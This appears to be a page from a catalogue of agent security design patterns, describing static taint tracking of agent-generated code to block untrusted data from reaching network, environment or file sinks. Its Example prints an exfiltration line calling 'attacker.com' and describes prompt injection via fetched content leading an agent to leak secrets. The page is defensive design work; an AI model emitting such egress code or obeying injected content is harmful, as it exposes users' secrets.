Code-Then-Execute with Dataflow Analysis
also known as Tainted-Value Code Execution, Sandbox-DSL with Provenance
Have the agent emit code in a sandbox DSL whose values are statically tagged trusted/tainted via dataflow analysis before execution, enabling per-value policy enforcement.
Context
An agent solves complex tasks by generating code that the runtime executes — data extraction, multi-step computations, tool chains. Some inputs to the code come from untrusted sources (user input, fetched content, tool outputs from third-party APIs).
Problem
Without provenance tracking, the executor cannot distinguish trusted values (the agent's plan, user goal) from tainted values (fetched content that could be attacker-controlled). The same `exec(code)` runs both. A prompt injection in fetched content can produce code that, e.g., reads secrets from env and embeds them in an outbound URL — and the sandbox cannot reject it because it cannot tell the URL is tainted.
Forces
- Free-form code generation is the agent's primary capability.
- Static dataflow analysis on generated code constrains expressivity.
- Tagging every value as trusted/tainted requires the DSL to track provenance.
Example
A research agent generates code: `summary = summarize(fetch('https://...'))`. The fetched content is TAINTED. The agent then writes `requests.get(f'https://attacker.com?d={summary}')`. Dataflow analysis sees TAINTED → network egress → rejects program before execution. Without the analysis the sandbox would have allowed the egress because outbound HTTPS is permitted.
Diagram
Solution
Therefore:
Define a sandbox DSL (subset of Python/TS or a custom Pyret-style language) where every value carries a provenance tag (TRUSTED, TAINTED, MIXED). The runtime performs static dataflow analysis on each agent-generated program before execution: if a TAINTED value reaches a sink declared sensitive (network egress, env reads, file writes outside scratch dir), reject the program. Pair with sandbox-isolation, action-selector-pattern.
What this pattern forbids. The runtime may not execute agent-generated code without first running dataflow analysis; programs whose taint reaches a sensitive sink are rejected, not sanitized.
And the patterns that stand alongside it, or against it —
- complementsSandbox Isolation★★— Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
- complementsCode-as-Action Agent★— Have the agent emit a code snippet as its action each step, executed in a constrained interpreter, instead of emitting JSON tool calls; tool composition becomes function nesting and control flow inside the snippet.
- complementsCode Execution★★— Let the model emit code, run it in a sandbox, and treat the run as the answer instead of trusting the model to compute in its head.
- complementsAction Selector Pattern★— Eliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.
- complementsTool Output Poisoning Defense★— Treat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.
Neighbourhood
Click any neighbour to follow the language. Scroll to zoom, drag to pan.